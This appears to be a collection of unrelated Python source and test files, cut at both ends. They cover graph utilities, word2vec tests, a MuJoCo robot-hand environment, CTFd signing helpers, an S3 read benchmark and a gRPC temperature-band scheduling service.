node_index, edge_index = construct_full_graph(5)
node_input = torch.randn(10, 10)
edge_input = [get_edge_features(node_input[:5], edge_index, lambda a, b: b - a),
get_edge_features(node_input[:5], edge_index, lambda a, b: b - a)]
edge_input = torch.cat(edge_input, dim=0)
node_index = [node_index, node_index]
edge_index = [edge_index, edge_index]
gs = collate_torch_graphs(node_input, edge_input, node_index, edge_index)
ni, ei = separate_graph_collated_features(gs.x, node_index, edge_index)
assert(to_numpy(torch.all(ei == edge_input)) == 1)
assert(to_numpy(torch.all(ni == node_input)) == 1)
def construct_full_graph(num_objects, self_connection=False):
node_index = np.arange(num_objects)
edge_index = fully_connected_edges(node_index, self_connection=self_connection)
return node_index, edge_index
def get_edge_features(node_features, edge_index, feature_func):
return feature_func(node_features[edge_index[:, 0], ...], node_features[edge_index[:, 1], ...])
def main():
node_idx = np.array([0, 1, 2], dtype=np.int64)
edge_idx = np.array([[0, 1], [0, 2]], dtype=np.int64)
supernode_clique = np.tile(node_idx[None, ...], (len(edge_idx), 1))
new_node_idx, new_edge_idx = add_supernodes(node_idx, edge_idx, supernode_clique)
node_features = np.array([[0, 0, 0], [1, 1, 1], [2, 2, 2]])
edge_feat = get_edge_features(node_features, edge_idx, lambda a, b: b - a)
print()
if __name__ == '__main__':
main()
|
470594
|
import pytest
from mage.node2vec_online_module.w2v_learners import GensimWord2Vec
EMBEDDINGS_DIM = 2
INCORRECT_NEGATIVE_RATE = -1
@pytest.fixture
def w2v_learner():
return GensimWord2Vec(
embedding_dimension=EMBEDDINGS_DIM,
learning_rate=0.01,
skip_gram=True,
negative_rate=0,
threads=1,
)
@pytest.fixture
def w2v_learner_wrong_negative_rate():
return GensimWord2Vec(
embedding_dimension=EMBEDDINGS_DIM,
learning_rate=0.01,
skip_gram=True,
negative_rate=INCORRECT_NEGATIVE_RATE,
threads=1,
)
def test_calculate_embeddings(w2v_learner):
sentences = [[1, 2], [2, 4], [3, 2]]
w2v_learner.partial_fit(sentences)
embeddings_dict = w2v_learner.get_embedding_vectors()
assert len(embeddings_dict) == 4
def test_correct_embedding_dimension(w2v_learner):
sentences = [[1, 2], [2, 4], [3, 2]]
w2v_learner.partial_fit(sentences)
embeddings_dict = w2v_learner.get_embedding_vectors()
for key, value in embeddings_dict.items():
assert len(value) == EMBEDDINGS_DIM
def test_incorrect_negative_rate(w2v_learner_wrong_negative_rate):
assert w2v_learner_wrong_negative_rate.negative_rate == INCORRECT_NEGATIVE_RATE
assert w2v_learner_wrong_negative_rate.embedding_dimension == EMBEDDINGS_DIM
sentences = [[1, 2], [2, 4], [3, 2]]
w2v_learner_wrong_negative_rate.partial_fit(sentences)
assert w2v_learner_wrong_negative_rate.negative_rate == 0
def test_correct_training(w2v_learner):
sentences = [[1, 2], [2, 4], [3, 2]]
w2v_learner.partial_fit(sentences)
calculated_embeddings_dict = w2v_learner.get_embedding_vectors()
non_existing_sentence = [[3, 4]]
w2v_learner.partial_fit(non_existing_sentence)
new_embeddings_dict = w2v_learner.get_embedding_vectors()
for key, value in calculated_embeddings_dict.items():
assert key in new_embeddings_dict
all([a == b for a, b in zip(value, new_embeddings_dict[key])])
|
470626
|
from bitmovin_api_sdk.encoding.outputs.s3_role_based.s3_role_based_api import S3RoleBasedApi
from bitmovin_api_sdk.encoding.outputs.s3_role_based.customdata.customdata_api import CustomdataApi
from bitmovin_api_sdk.encoding.outputs.s3_role_based.s3_role_based_output_list_query_params import S3RoleBasedOutputListQueryParams
|
470670
|
import os
from datetime import timedelta
DATABASE_URI = os.environ["DATABASE_URI"]
ENCRYPTION_KEY = os.environ["ENCRYPTION_KEY"]
BIND_HOST = os.environ.get("BIND_HOST", "localhost")
BIND_PORT = int(os.environ.get("BIND_PORT", "80"))
SCHEDULE_INTERVAL = timedelta(
seconds=int(os.environ.get("SHEDULE_INTERVAL_SECONDS", 50))
)
|
470726
|
from collections import deque
class Solution:
def deckRevealedIncreasing(self, deck: List[int]) -> List[int]:
d = deque()
for x in sorted(deck)[::-1]:
d.rotate()
d.appendleft(x)
return list(d)
|
470737
|
from server.util.tags import COLLECTION_SET_PARTISANSHIP_QUINTILES_2019
from server.util.csv import SOURCE_LIST_CSV_METADATA_PROPS
SOURCE_LIST_CSV_EDIT_PROPS = ['media_id', 'url', 'name'] + \
SOURCE_LIST_CSV_METADATA_PROPS + \
['public_notes', 'editor_notes', 'stories_per_day', 'first_story']
SOURCE_FEED_LIST_CSV_PROPS = ['media_id', 'url', 'name'] + \
['public_notes', 'editor_notes', 'stories_per_day', 'first_story', 'active_feed_count',
'num_stories_90', 'latest_scrape_job', 'num_stories_last_year']
|
470742
|
import os
import torch
import numpy as np
import matplotlib.pyplot as plt
from main import Network
if __name__ == '__main__':
# within the network are not only the weights, but also the convergence history
network = torch.load('../data/english_full/latest_weights')
current_path = os.path.dirname(os.path.realpath(__file__))
savedir = current_path + '/../results/EN_short_dataset_labeled'
plt.title('convergence for the 200th datapoint')
plt.ylabel('loss')
plt.xlabel('epochs')
plt.plot(network.arc_loss_particular, 'b-', label='arc loss')
plt.plot(network.label_loss_particular, 'g-', label='label loss')
plt.plot(network.total_loss_particular, 'r-', label='total loss')
plt.legend()
plt.savefig(savedir + '/convergence_particular.png')
plt.clf()
plt.title('convergence for the dataset')
plt.ylabel('loss')
plt.xlabel('epochs')
plt.plot(network.arc_loss, 'b-', label='arc loss')
plt.plot(network.label_loss, 'g-', label='label loss')
plt.plot(network.total_loss, 'r-', label='total loss')
plt.legend()
plt.savefig(savedir + '/convergence.png')
plt.clf()
plt.title('arc loss for the 200th datapoint')
plt.ylabel('loss')
plt.xlabel('epochs')
plt.plot(network.arc_loss_particular, 'b-')
plt.savefig(savedir + '/arc_loss_particular.png')
plt.clf()
plt.title('label loss for the 200th datapoint')
plt.ylabel('loss')
plt.xlabel('epochs')
plt.plot(network.label_loss_particular, 'g-')
plt.savefig(savedir + '/label_loss_particular.png')
plt.clf()
plt.title('total loss for the 200th datapoint')
plt.ylabel('loss')
plt.xlabel('epochs')
plt.plot(network.total_loss_particular, 'r-')
plt.savefig(savedir + '/total_loss_particular.png')
plt.clf()
plt.title('arc loss of the dataset')
plt.ylabel('loss')
plt.xlabel('epochs')
plt.plot(network.arc_loss, 'b-')
plt.savefig(savedir + '/arc_loss.png')
plt.clf()
plt.title('label loss of the dataset')
plt.ylabel('loss')
plt.xlabel('epochs')
plt.plot(network.label_loss, 'g-')
plt.savefig(savedir + '/label_loss.png')
plt.clf()
plt.title('total loss of the dataset')
plt.ylabel('loss')
plt.xlabel('epochs')
plt.plot(network.total_loss, 'r-')
plt.savefig(savedir + '/total_loss.png')
plt.clf()
|
470744
|
import os
import numpy as np
from gym import spaces, utils
from mjrl.envs import mujoco_env
from mujoco_py import MjViewer
from d4rl import offline_env
ADD_BONUS_REWARDS = True
class RelocateEnvV0(mujoco_env.MujocoEnv, utils.EzPickle, offline_env.OfflineEnv):
def __init__(self, **kwargs):
offline_env.OfflineEnv.__init__(self, **kwargs)
self.target_obj_sid = 0
self.S_grasp_sid = 0
self.obj_bid = 0
curr_dir = os.path.dirname(os.path.abspath(__file__))
mujoco_env.MujocoEnv.__init__(self, curr_dir + "/assets/DAPG_relocate.xml", 5)
# Override action_space to -1, 1
self.action_space = spaces.Box(
low=-1.0, high=1.0, dtype=np.float32, shape=self.action_space.shape
)
# change actuator sensitivity
self.sim.model.actuator_gainprm[
self.sim.model.actuator_name2id("A_WRJ1") : self.sim.model.actuator_name2id(
"A_WRJ0"
)
+ 1,
:3,
] = np.array([10, 0, 0])
self.sim.model.actuator_gainprm[
self.sim.model.actuator_name2id("A_FFJ3") : self.sim.model.actuator_name2id(
"A_THJ0"
)
+ 1,
:3,
] = np.array([1, 0, 0])
self.sim.model.actuator_biasprm[
self.sim.model.actuator_name2id("A_WRJ1") : self.sim.model.actuator_name2id(
"A_WRJ0"
)
+ 1,
:3,
] = np.array([0, -10, 0])
self.sim.model.actuator_biasprm[
self.sim.model.actuator_name2id("A_FFJ3") : self.sim.model.actuator_name2id(
"A_THJ0"
)
+ 1,
:3,
] = np.array([0, -1, 0])
self.target_obj_sid = self.sim.model.site_name2id("target")
self.S_grasp_sid = self.sim.model.site_name2id("S_grasp")
self.obj_bid = self.sim.model.body_name2id("Object")
utils.EzPickle.__init__(self)
self.act_mid = np.mean(self.model.actuator_ctrlrange, axis=1)
self.act_rng = 0.5 * (
self.model.actuator_ctrlrange[:, 1] - self.model.actuator_ctrlrange[:, 0]
)
def step(self, a):
a = np.clip(a, -1.0, 1.0)
try:
a = self.act_mid + a * self.act_rng # mean center and scale
except:
a = a # only for the initialization phase
self.do_simulation(a, self.frame_skip)
ob = self.get_obs()
obj_pos = self.data.body_xpos[self.obj_bid].ravel()
palm_pos = self.data.site_xpos[self.S_grasp_sid].ravel()
target_pos = self.data.site_xpos[self.target_obj_sid].ravel()
reward = -0.1 * np.linalg.norm(palm_pos - obj_pos) # take hand to object
if obj_pos[2] > 0.04: # if object off the table
reward += 1.0 # bonus for lifting the object
reward += -0.5 * np.linalg.norm(
palm_pos - target_pos
) # make hand go to target
reward += -0.5 * np.linalg.norm(
obj_pos - target_pos
) # make object go to target
if ADD_BONUS_REWARDS:
if np.linalg.norm(obj_pos - target_pos) < 0.1:
reward += 10.0 # bonus for object close to target
if np.linalg.norm(obj_pos - target_pos) < 0.05:
reward += 20.0 # bonus for object "very" close to target
goal_achieved = True if np.linalg.norm(obj_pos - target_pos) < 0.1 else False
return ob, reward, False, dict(goal_achieved=goal_achieved)
def get_obs(self):
# qpos for hand
# xpos for obj
# xpos for target
qp = self.data.qpos.ravel()
obj_pos = self.data.body_xpos[self.obj_bid].ravel()
palm_pos = self.data.site_xpos[self.S_grasp_sid].ravel()
target_pos = self.data.site_xpos[self.target_obj_sid].ravel()
return np.concatenate(
[qp[:-6], palm_pos - obj_pos, palm_pos - target_pos, obj_pos - target_pos]
)
def reset_model(self):
qp = self.init_qpos.copy()
qv = self.init_qvel.copy()
self.set_state(qp, qv)
self.model.body_pos[self.obj_bid, 0] = self.np_random.uniform(
low=-0.15, high=0.15
)
self.model.body_pos[self.obj_bid, 1] = self.np_random.uniform(
low=-0.15, high=0.3
)
self.model.site_pos[self.target_obj_sid, 0] = self.np_random.uniform(
low=-0.2, high=0.2
)
self.model.site_pos[self.target_obj_sid, 1] = self.np_random.uniform(
low=-0.2, high=0.2
)
self.model.site_pos[self.target_obj_sid, 2] = self.np_random.uniform(
low=0.15, high=0.35
)
self.sim.forward()
return self.get_obs()
def get_env_state(self):
"""
Get state of hand as well as objects and targets in the scene
"""
qp = self.data.qpos.ravel().copy()
qv = self.data.qvel.ravel().copy()
hand_qpos = qp[:30]
obj_pos = self.data.body_xpos[self.obj_bid].ravel()
palm_pos = self.data.site_xpos[self.S_grasp_sid].ravel()
target_pos = self.data.site_xpos[self.target_obj_sid].ravel()
return dict(
hand_qpos=hand_qpos,
obj_pos=obj_pos,
target_pos=target_pos,
palm_pos=palm_pos,
qpos=qp,
qvel=qv,
)
def set_env_state(self, state_dict):
"""
Set the state which includes hand as well as objects and targets in the scene
"""
qp = state_dict["qpos"]
qv = state_dict["qvel"]
obj_pos = state_dict["obj_pos"]
target_pos = state_dict["target_pos"]
self.set_state(qp, qv)
self.model.body_pos[self.obj_bid] = obj_pos
self.model.site_pos[self.target_obj_sid] = target_pos
self.sim.forward()
def mj_viewer_setup(self):
self.viewer = MjViewer(self.sim)
self.viewer.cam.azimuth = 90
self.sim.forward()
self.viewer.cam.distance = 1.5
def evaluate_success(self, paths):
num_success = 0
num_paths = len(paths)
# success if object close to target for 25 steps
for path in paths:
if np.sum(path["env_infos"]["goal_achieved"]) > 25:
num_success += 1
success_percentage = num_success * 100.0 / num_paths
return success_percentage
|
470753
|
import sys
sys.path.append("/workdata/pygdsm")
import pylab as plt
import healpy as hp
from datetime import datetime
from pygdsm import HaslamSkyModel, HaslamObserver, GSMObserver
def test_compare_gsm_to_old():
gl = HaslamSkyModel(freq_unit='MHz')
dl = gl.generate(408)
gl.view()
import pylab as plt
plt.show()
def test_observer_test():
# Setup observatory location - in this case, Parkes Australia
(latitude, longitude, elevation) = ('-32.998370', '148.263659', 100)
ov = HaslamObserver()
ov.lon = longitude
ov.lat = latitude
ov.elev = elevation
ov.date = datetime(2000, 1, 1, 23, 0)
ov.generate(200)
d = ov.view(logged=True)
ov = GSMObserver()
ov.lon = longitude
ov.lat = latitude
ov.elev = elevation
ov.date = datetime(2000, 1, 1, 23, 0)
ov.generate(200)
d = ov.view(logged=True)
plt.show()
if __name__ == "__main__":
test_compare_gsm_to_old()
test_observer_test()
|
470754
|
import cv2
import sys, json
import argparse
from xml.dom import minidom
import numpy as np
import os
new_jsons = 'newjsons'
for p in [new_jsons]:
if not os.path.exists(p):
os.makedirs(p)
ap = argparse.ArgumentParser()
ap.add_argument('-t', '--path_annotation_jsons', required=True, help = 'path to imgs with annotations')
args = ap.parse_args()
jsons_names = [img for img in os.listdir(args.path_annotation_jsons) if img.endswith(".json")]
all_labels = {}
for js in jsons_names:
fpath = args.path_annotation_jsons+'/'+js
fdata = json.load(open(fpath,'r'))
newdata = {}
nvoids = 0
for key in fdata:
if key == 'shapes':
newdata['shapes'] = []
for m in fdata['shapes']:
m['label'] = m['label'].lower()
if m['label'] == 'void':
nvoids += 1
continue
newdata['shapes'].append(m)
else:
newdata[key] = fdata[key]
print('remove %d voids from %s'%(nvoids,js)+' and saving the new file to '+new_jsons+'/'+js)
json.dump(newdata,open(new_jsons+'/'+js,'w'))
|
470758
|
import json
import sys
import six
from six.moves.urllib_parse import urlparse
class Request:
def __init__(self, raw_json):
self.headers = raw_json['headers']
self.method = raw_json['method']
self.body = raw_json['body']
self.url = raw_json['url']
self.ip = raw_json['remote_addr']
components = urlparse(self.url)
self.path = components.path
self.host = components.hostname
self.scheme = components.scheme
self.query = components.query
self.port = components.port
self.fragment = components.fragment
self.params = components.params
self.netloc = components.netloc
class Response:
def __init__(self, headers=None, body='', status_code=200):
self.headers = {} if headers is None else headers
if isinstance(body, (six.text_type, six.binary_type, dict, list)):
self.body = body
else:
self.body = str(body)
self.status_code = status_code
def _json_string(self):
return json.dumps({
'body': self.body,
'status_code': self.status_code,
'headers': self.headers,
})
def handle_http_event(handle_fn):
req = Request(json.loads(sys.stdin.read()))
res = handle_fn(req)
if isinstance(res, Response):
sys.stdout.write(res._json_string())
else:
sys.stdout.write(Response()._json_string())
|
470775
|
import hashlib
import hmac as _hmac
from flask import current_app
from itsdangerous import Signer
from itsdangerous.exc import ( # noqa: F401
BadSignature,
BadTimeSignature,
SignatureExpired,
)
from itsdangerous.url_safe import URLSafeTimedSerializer
from CTFd.utils import string_types
def serialize(data, secret=None):
if secret is None:
secret = current_app.config["SECRET_KEY"]
s = URLSafeTimedSerializer(secret)
return s.dumps(data)
def unserialize(data, secret=None, max_age=432000):
if secret is None:
secret = current_app.config["SECRET_KEY"]
s = URLSafeTimedSerializer(secret)
return s.loads(data, max_age=max_age)
def sign(data, secret=None):
if secret is None:
secret = current_app.config["SECRET_KEY"]
s = Signer(secret)
return s.sign(data)
def unsign(data, secret=None):
if secret is None:
secret = current_app.config["SECRET_KEY"]
s = Signer(secret)
return s.unsign(data)
def hmac(data, secret=None, digest=hashlib.sha1):
if secret is None:
secret = current_app.config["SECRET_KEY"]
if isinstance(data, string_types):
data = data.encode("utf-8")
if isinstance(secret, string_types):
secret = secret.encode("utf-8")
return _hmac.new(key=secret, msg=data, digestmod=digest).hexdigest()
|
470777
|
from django.db import models
from django.contrib.auth.backends import UserModel
class TblClass(models.Model):
name = models.CharField(max_length=100, help_text="班级名称")
tag = models.CharField(max_length=100, unique=True, help_text="标签")
# null=True 数据库中可以为空 blank=True 在表单中可以为空
description = models.CharField(max_length=512, null=True, blank=True, help_text="班级描述")
# db_constraint=False 关闭数据库约束,保留关联查询
users = models.ManyToManyField(UserModel, related_name='classes', help_text="班级成员")
class Meta:
db_table = 'tbl_class'
|
470785
|
import os
from metaflow import FlowSpec, step, Parameter, S3, profile, parallel_map
URL = 's3://commoncrawl/crawl-data/CC-MAIN-2021-25/segments/1623488519735.70/wet/'
def load_s3(s3, num):
files = list(s3.list_recursive([URL]))[:num]
total_size = sum(f.size for f in files) / 1024**3
stats = {}
with profile('downloading', stats_dict=stats):
loaded = s3.get_many([f.url for f in files])
s3_gbps = (total_size * 8) / (stats['downloading'] / 1000.)
print("S3->EC2 throughput: %2.1f Gb/s" % s3_gbps)
return [obj.path for obj in loaded]
class S3BenchmarkFlow(FlowSpec):
local_dir = Parameter('local_dir',
help='Read local files from this directory')
num = Parameter('num_files',
help='maximum number of files to read',
default=50)
@step
def start(self):
with S3() as s3:
with profile('Loading and processing'):
if self.local_dir:
files = [os.path.join(self.local_dir, f)
for f in os.listdir(self.local_dir)][:self.num]
else:
files = load_s3(s3, self.num)
print("Reading %d objects" % len(files))
stats = {}
with profile('reading', stats_dict=stats):
size = sum(parallel_map(lambda x: len(open(x, 'rb').read()),
files)) / 1024**3
read_gbps = (size * 8) / (stats['reading'] / 1000.)
print("Read %2.fGB. Throughput: %2.1f Gb/s" % (size, read_gbps))
self.next(self.end)
@step
def end(self):
pass
if __name__ == '__main__':
S3BenchmarkFlow()
|
470801
|
import os
import pytest
from six import text_type
from leapp.libraries.actor import checksendmail
@pytest.mark.parametrize('test_input,migrate', [
('IPv6:::1\n', True),
('IPv6:0:0:0:0:0:0:0:1\n', False),
])
def test_check_migration(tmpdir, monkeypatch, test_input, migrate):
test_cfg_path = text_type(tmpdir)
test_cfg_file = os.path.join(test_cfg_path, 'sendmail.cf')
with open(test_cfg_file, 'w') as file_out:
file_out.write(test_input)
monkeypatch.setattr(checksendmail, 'SendmailConfDir', test_cfg_path)
files = checksendmail.check_files_for_compressed_ipv6()
if migrate:
assert files == [test_cfg_file]
else:
assert files == []
|
470806
|
from concurrent import futures
import time
import grpc
import logging
logging.basicConfig(format='%(asctime)s,%(msecs)d %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s', datefmt='%Y-%m-%d:%H:%M:%S', level=logging.DEBUG)
import temperature_bands_pb2
import temperature_bands_pb2_grpc
_ONE_DAY_IN_SECONDS = 60 * 60 * 24
# getting the utils file here
import os, sys
import xbos_services_utils3 as utils
import datetime
import pytz
import numpy as np
import pandas as pd
import yaml
import traceback
from pathlib import Path
DAYS_IN_WEEK = 7
TEMPERATURE_BANDS_DATA_PATH = Path(os.environ["TEMPERATURE_BANDS_DATA_PATH"])
TEMPERATURE_BANDS_HOST_ADDRESS = os.environ["TEMPERATURE_BANDS_HOST_ADDRESS"]
def _get_temperature_band_config(building, zone):
band_path = str(TEMPERATURE_BANDS_DATA_PATH / building / (zone + ".yml"))
if os.path.exists(band_path):
with open(band_path, "r") as f:
try:
config = yaml.load(f)
except yaml.YAMLError:
return None, "yaml could not read file at: %s" % band_path
else:
return None, "consumption file could not be found. path: %s." % band_path
return config, None
def _get_week_comfortband(building, zone, date, interval):
"""
Gets the whole comfortband from the zone configuration file. Correctly Resamples the data according to interval
:param date: The date for which we want to start the week. Timezone aware.
:param interval: int:seconds. The interval/frequency of resampling. Has to be such that 60 % interval == 0
:return: pd.df (col = "t_low", "t_high") with time_series index for the date provided and in timezone aware and in timezone of data input.
"""
config, err = _get_temperature_band_config(building, zone)
if config is None:
return None, err
# Set the date to the controller timezone.
building_date = date.astimezone(tz=pytz.timezone(config["tz"]))
weekday = building_date.weekday()
list_data = []
comfortband_data = config["comfortband"]
df_do_not_exceed, err = _get_week_do_not_exceed(building, zone, building_date, interval)
if df_do_not_exceed is None:
return None, err
# Note, we need to get a day before the start and after the end of the week to correctly resample due to timezones.
for i in range(DAYS_IN_WEEK + 2):
curr_weekday = (weekday + i - 1) % DAYS_IN_WEEK
curr_day = building_date + datetime.timedelta(days=i - 1)
curr_idx = []
curr_comfortband = []
weekday_comfortband = np.array(comfortband_data[curr_weekday])
for interval_comfortband in weekday_comfortband:
start, end, t_low, t_high = interval_comfortband
start = utils.combine_date_time(start, curr_day)
if t_low is None or t_low == "None":
interval_safety = df_do_not_exceed[start-datetime.timedelta(seconds=interval):start]
t_low = interval_safety["t_low"].mean() # TODO We want mean weighter by duration. Fine approximation for now
if t_high is None or t_high == "None":
interval_safety = df_do_not_exceed[start-datetime.timedelta(seconds=interval):start]
t_high = interval_safety["t_high"].mean()
curr_idx.append(start)
curr_comfortband.append({"t_low": float(t_low),
"t_high": float(t_high)})
list_data.append(pd.DataFrame(index=curr_idx, data=curr_comfortband))
df_comfortband = pd.concat(list_data)
df_comfortband = df_comfortband.tz_convert(date.tzinfo)
rounded_date = utils.decrement_to_start_of_day(date, interval)
df_comfortband = utils.smart_resample(df_comfortband, rounded_date, rounded_date+datetime.timedelta(days=7), interval, "pad")
return df_comfortband, None
def _get_week_do_not_exceed(building, zone, date, interval):
"""
Gets the whole do_not_exceed from the zone configuration file. Correctly Resamples the data according to interval
:param date: The date for which we want to start the week. Timezone aware.
:param interval: float:seconds. The interval/frequency of resampling. Has to be such that 60 % interval == 0
:return: pd.df (col = "t_low", "t_high") with time_series index for the date provided and in timezone aware and in timezone of data input.
"""
config, err = _get_temperature_band_config(building, zone)
if config is None:
return None, err
# Set the date to the controller timezone.
building_date = date.astimezone(tz=pytz.timezone(config["tz"]))
weekday = building_date.weekday()
list_data = []
do_not_exceed_data = config["do_not_exceed"]
# Note, we need to get a day before the start and after the end of the week to correctly resample due to timezones.
for i in range(DAYS_IN_WEEK + 2):
curr_weekday = (weekday + i - 1) % DAYS_IN_WEEK
curr_day = building_date + datetime.timedelta(days=i - 1)
curr_idx = []
curr_do_not_exceed = []
weekday_do_not_exceed = np.array(do_not_exceed_data[curr_weekday])
for interval_do_not_exceed in weekday_do_not_exceed:
start, end, t_low, t_high = interval_do_not_exceed
start = utils.combine_date_time(start, curr_day)
curr_idx.append(start)
curr_do_not_exceed.append({"t_low": float(t_low),
"t_high": float(t_high)})
list_data.append(pd.DataFrame(index=curr_idx, data=curr_do_not_exceed))
df_do_not_exceed = pd.concat(list_data)
df_do_not_exceed = df_do_not_exceed.tz_convert(date.tzinfo)
rounded_date = utils.decrement_to_start_of_day(date, interval)
df_do_not_exceed = utils.smart_resample(df_do_not_exceed, rounded_date, rounded_date+datetime.timedelta(days=7), interval, "pad")
return df_do_not_exceed, None
def get_band(building, zone, start, end, interval, type_band):
"""Gets the comfortband/do_noteceed band of a zone from start to end in interval minutes frequency
:param building: string
:param zone: string
:param start: datetime. timezone aware
:param end: datetime. timezone aware.
:param interval: int:seconds. 24*60*60 % interval == 0
:param type_band: string ["comfortband", "do_not_exceed"] decides which setpoints to get.
:return:
NOTE: If (end-start).total_seconds % interval != 0, then end is rounded down to next closest
such that this condition is satisfied. New end will also not be inclusive.
"""
if type_band == "comfortband":
first_seven_days, err = _get_week_comfortband(building, zone, start, interval)
elif type_band == "do_not_exceed":
first_seven_days, err = _get_week_do_not_exceed(building, zone, start, interval)
else:
return None, "Invalid method given for band."
if first_seven_days is None:
return None, err
first_seven_days_start = first_seven_days.index[0]
first_seven_days_end = first_seven_days_start + datetime.timedelta(days=DAYS_IN_WEEK)
if end < first_seven_days_end:
return first_seven_days[start:end][:-1], None
# get band for the day after the first 7 days we found.
remaining_data = []
for i in range((end - first_seven_days_end).days + 1):
curr_offset = i % DAYS_IN_WEEK
curr_time = first_seven_days_end + datetime.timedelta(days=i)
curr_data = first_seven_days[first_seven_days_start + datetime.timedelta(days=curr_offset):
first_seven_days_start + datetime.timedelta(days=curr_offset + 1)][:int(24*60*60/interval)]
curr_start_date = curr_time
curr_end_date = curr_start_date + datetime.timedelta(days=1)
date_range = pd.date_range(start=curr_start_date, end=curr_end_date, freq=str(interval/60.) + "T")[:-1]
curr_data.index = date_range
remaining_data.append(curr_data)
band_series = pd.concat([first_seven_days] + remaining_data)
return band_series[start:end][:-1], None
def get_comfortband(request):
"""Returns comfortband data for a given request or None."""
start_time = time.time()
logging.info("received request:", request.building, request.zone, request.start, request.end, request.window, request.unit)
duration = utils.get_window_in_sec(request.window)
request_length = [len(request.building), len(request.zone), request.start, request.end,
duration]
if any(v == 0 for v in request_length):
return None, "invalid request, empty params"
# if request.end > int(time.time() * 1e9):
# return None, "invalid request, end date is in the future. Now: %d and end: %d" % (
# time.time() * 1e9, request.end)
if request.start >= request.end:
return None, "invalid request, start date is after end date."
if request.start < 0 or request.end < 0:
return None, "invalid request, negative dates"
if request.start + (duration * 1e9) > request.end:
return None, "invalid request, start date + window is greater than end date"
if request.unit != "F":
return None, "invalid request, only fahrenheit support."
if 60*60 % duration != 0:
return None, "invalid request, window is not a factor of an hour (60(min)*60(sec)%window != 0). e.g. 15min is a factor but 25 is not."
start_datetime = datetime.datetime.utcfromtimestamp(
float(request.start / 1e9)).replace(tzinfo=pytz.utc)
end_datetime = datetime.datetime.utcfromtimestamp(
float(request.end / 1e9)).replace(tzinfo=pytz.utc)
error_checking_time = time.time()
comfortband, err = get_band(request.building, request.zone, start_datetime, end_datetime, duration, "comfortband")
if comfortband is None:
return [temperature_bands_pb2.SchedulePoint()], err
comfortband_time = time.time()
grpc_comfortband = []
for index, row in comfortband.iterrows():
grpc_comfortband.append(
temperature_bands_pb2.SchedulePoint(time=int(index.timestamp() * 1e9),
temperature_low=row["t_low"],
temperature_high=row["t_high"],
unit="F"))
response_creation_time = time.time()
logging.info("Error checking time %f seconds" % (error_checking_time - start_time ))
logging.info("Comfortband time %f seconds" % (comfortband_time - error_checking_time ))
logging.info("Response creation time %f seconds" % (response_creation_time - comfortband_time ))
return grpc_comfortband,None
# return temperature_bands_pb2.ScheduleReply(schedules=grpc_comfortband), None
def get_do_not_exceed(request):
"""Returns preprocessed thermal data for a given request or None."""
logging.info("received request:", request.building, request.zone, request.start, request.end, request.window, request.unit)
duration = utils.get_window_in_sec(request.window)
request_length = [len(request.building), len(request.zone), request.start, request.end,
duration]
if any(v == 0 for v in request_length):
return None, "invalid request, empty params"
# if request.end > int(time.time() * 1e9):
# return None, "invalid request, end date is in the future. Now: %d and end: %d" % (
# time.time() * 1e9, request.end)
if request.start >= request.end:
return None, "invalid request, start date is after end date."
if request.start < 0 or request.end < 0:
return None, "invalid request, negative dates"
if request.start + (duration * 1e9) > request.end:
return None, "invalid request, start date + window is greater than end date"
if request.unit != "F":
return None, "invalid request, only fahrenheit support."
if 60*60 % duration != 0:
return None, "invalid request, window is not a factor of an hour (60(min)*60(sec)%window != 0). e.g. 15min is a factor but 25 is not."
start_datetime = datetime.datetime.utcfromtimestamp(
float(request.start / 1e9)).replace(tzinfo=pytz.utc)
end_datetime = datetime.datetime.utcfromtimestamp(
float(request.end / 1e9)).replace(tzinfo=pytz.utc)
do_not_exceed, err = get_band(request.building, request.zone, start_datetime, end_datetime, duration, "do_not_exceed")
if do_not_exceed is None:
return [temperature_bands_pb2.SchedulePoint()], err
grpc_do_not_exceed = []
for index, row in do_not_exceed.iterrows():
grpc_do_not_exceed.append(
temperature_bands_pb2.SchedulePoint(time=int(index.timestamp() * 1e9),
temperature_low=row["t_low"],
temperature_high=row["t_high"],
unit="F"))
return grpc_do_not_exceed,None
# return temperature_bands_pb2.ScheduleReply(schedules=grpc_do_not_exceed), None
class SchedulesServicer(temperature_bands_pb2_grpc.SchedulesServicer):
def __init__(self):
pass
def GetComfortband(self, request, context):
"""A simple RPC.
Sends the outside temperature for a given building, within a duration (start, end), and a requested window
An error is returned if there are no temperature for the given request
"""
comfortband, error = get_comfortband(request)
if comfortband is None:
context.set_code(grpc.StatusCode.INVALID_ARGUMENT)
context.set_details(error)
return temperature_bands_pb2.SchedulePoint()
elif error is not None:
context.set_code(grpc.StatusCode.UNAVAILABLE)
context.set_details(error)
for band in comfortband:
yield band
# return comfortband
def GetDoNotExceed(self, request, context):
"""A simple RPC.
Sends the outside temperature for a given building, within a duration (start, end), and a requested window
An error is returned if there are no temperature for the given request
"""
do_not_exceed, error = get_do_not_exceed(request)
if do_not_exceed is None:
context.set_code(grpc.StatusCode.INVALID_ARGUMENT)
context.set_details(error)
return temperature_bands_pb2.SchedulePoint()
elif error is not None:
context.set_code(grpc.StatusCode.UNAVAILABLE)
context.set_details(error)
for dne in do_not_exceed:
yield dne
# return do_not_exceed
def serve():
server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
temperature_bands_pb2_grpc.add_SchedulesServicer_to_server(SchedulesServicer(), server)
server.add_insecure_port(TEMPERATURE_BANDS_HOST_ADDRESS)
logging.info("Serving on {0} with data path {1}".format(TEMPERATURE_BANDS_HOST_ADDRESS, TEMPERATURE_BANDS_DATA_PATH))
server.start()
try:
while True:
time.sleep(_ONE_DAY_IN_SECONDS)
except KeyboardInterrupt:
server.stop(0)
if __name__ == '__main__':
serve()
|
470809
|
import numpy as np
import six
from chainercv.utils.testing.assertions.assert_is_image import assert_is_image
from chainercv.utils.testing.assertions.assert_is_point import assert_is_point
def assert_is_point_dataset(dataset, n_point=None, n_example=None,
no_visible=False):
"""Checks if a dataset satisfies the point dataset API.
This function checks if a given dataset satisfies the point dataset
API or not.
If the dataset does not satifiy the API, this function raises an
:class:`AssertionError`.
Args:
dataset: A dataset to be checked.
n_point (int): The number of expected points per image.
If this is :obj:`None`, the number of points per image can be
arbitrary.
n_example (int): The number of examples to be checked.
If this argument is specified, this function picks
examples ramdomly and checks them. Otherwise,
this function checks all examples.
no_visible (bool): If :obj:`True`, we assume that
:obj:`visible` is always not contained.
If :obj:`False`, :obj;`visible` may or may not be contained.
"""
assert len(dataset) > 0, 'The length of dataset must be greater than zero.'
if n_example:
for _ in six.moves.range(n_example):
i = np.random.randint(0, len(dataset))
_check_example(dataset[i], n_point, no_visible)
else:
for i in six.moves.range(len(dataset)):
